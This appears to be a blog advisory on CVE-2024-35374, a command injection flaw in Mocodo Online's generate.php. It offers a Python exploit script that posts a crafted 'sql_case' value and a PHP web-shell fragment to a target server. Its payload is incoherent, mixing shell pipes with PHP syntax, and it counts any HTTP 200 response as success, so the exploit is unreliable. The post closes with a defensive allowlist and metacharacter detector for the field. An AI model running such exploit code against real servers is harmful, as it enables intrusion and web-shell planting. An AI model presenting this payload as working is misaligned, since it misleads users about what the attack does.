A critical security vulnerability has been discovered in Mocodo Online 4.2.6 and earlier versions that could allow remote attackers to execute arbitrary OS commands and achieve remote code execution (RCE) under specific conditions. The cause is that the 'sql_case' input field in /web/generate.php is not properly sanitized, so its value can be abused for command injection under certain conditions.

In this post, we will provide an overview of CVE-2024-35374, including a code snippet that demonstrates the vulnerability, links to the original references, and details about the exploit.

Mocodo Online Background

Mocodo Online is a web application suite that helps users create, edit, and visualize entity-relationship diagrams online. The suite is designed to work with various database systems and provide support for various SQL dialects.

Vulnerability Details: CVE-2024-35374
Mocodo Online 4.2.6 and earlier versions suffer from a critical security vulnerability allowing remote attackers to achieve remote code execution (RCE) under certain conditions. The issue occurs because of improper sanitization of the 'sql_case' input field in the /web/generate.php file, leading to command injection.

Code Snippet: Exploiting the Vulnerability
The following code snippet demonstrates how an attacker could exploit this vulnerability to achieve remote code execution:

import requests

# Endpoint of the vulnerable Mocodo Online instance
url = "http://target.com/mocodo/web/generate.php"

# Form fields; the unsanitized 'sql_case' field carries the injected value
payload = {
    "sql_case": "UPPER|{$_=('|')}|",
    "entity_columns": "",
    "filename": "vuln.php",
    "code": "echo $_GET[cmd];"
}

response = requests.post(url, data=payload)

# HTTP 200 only shows that the server accepted the request
if response.status_code == 200:
    print("Payload successfully executed!")
else:
    print("An error occurred while trying to exploit the vulnerability")

In this example, the attacker crafts a malicious payload that contains arbitrary code to be executed on the server and sends a POST request to the vulnerable generate.php endpoint. If the payload is successfully executed, the attacker would have remote code execution access on the targeted server.

Original References

1. CVE-2024-35374 - Official CVE Details by MITRE Corporation
2. Mocodo Online GitHub Repository - Original Mocodo Online project source code

Exploit Details

An attacker with knowledge of the target server and the vulnerable Mocodo Online version can craft a malicious payload and send a POST request to exploit this vulnerability. Upon successful exploitation, the attacker would have remote shell access to execute arbitrary code within the context of the web server.

It is important to note that the Mocodo Online application may not be running with elevated privileges, depending on the target environment and configuration. If this is the case, the attacker may still need to perform privilege escalation for a more significant impact. However, even without elevated privileges, an attacker could potentially use this exploit to steal sensitive data, deface websites, or perform other malicious actions.

Conclusion

CVE-2024-35374 is a critical security vulnerability in Mocodo Online 4.2.6 and earlier versions, allowing remote attackers to execute arbitrary commands and achieve remote code execution. Developers and administrators are advised to promptly update their Mocodo Online instances to a patched version or explore additional security measures like input sanitization and strict access controls.
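
One way to apply the input-sanitization advice to the 'sql_case' field is an allowlist check in front of /web/generate.php, for example in a reverse proxy hook or a log-review script. This is an added example, not Mocodo's code or its patch; the allowlist values, the function name classify and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Assumption: the values the form legitimately offers. Replace with the
# option list of the Mocodo Online version you actually run.
ALLOWED_SQL_CASE = {"upper", "lower"}  # hypothetical allowlist

# Characters with special meaning to a POSIX shell, plus quotes and whitespace.
SHELL_META = re.compile(r"[|;&$`<>(){}\[\]\\'\"\s]")

ENDPOINT = "/web/generate.php"


def classify(path: str, body: str) -> str:
    """Return 'ok', 'reject' or 'alert' for one POST request.

    ok     - not the endpoint, or sql_case absent / on the allowlist
    reject - sql_case unknown but harmless-looking: refuse with HTTP 400
    alert  - sql_case carries shell metacharacters: refuse and log
    """
    if not path.split("?", 1)[0].endswith(ENDPOINT):
        return "ok"
    values = parse_qs(body, keep_blank_values=True).get("sql_case", [])
    verdict = "ok"
    for value in values:  # a repeated parameter must pass in every copy
        if SHELL_META.search(value):
            return "alert"
        if value not in ALLOWED_SQL_CASE:
            verdict = "reject"
    return verdict


# Constructed sample requests (path, url-encoded body); the third reuses the
# sql_case value shown in the snippet earlier in this post.
SAMPLES = [
    ("/mocodo/web/generate.php", urlencode({"sql_case": "upper", "text": "CLIENT: id, name"})),
    ("/mocodo/web/generate.php", urlencode({"sql_case": "camel"})),
    ("/mocodo/web/generate.php", urlencode({"sql_case": "UPPER|{$_=('|')}|"})),
    ("/mocodo/web/index.php", urlencode({"sql_case": "x|y"})),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(classify(path, body), path, body)
```

Both 'reject' and 'alert' should stop the request before the value reaches any command line; the check complements upgrading and does not replace it.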

Timeline

Published on: 05/24/2024 21:15:59 UTC
Last modified on: 08/20/2024 15:35:14 UTC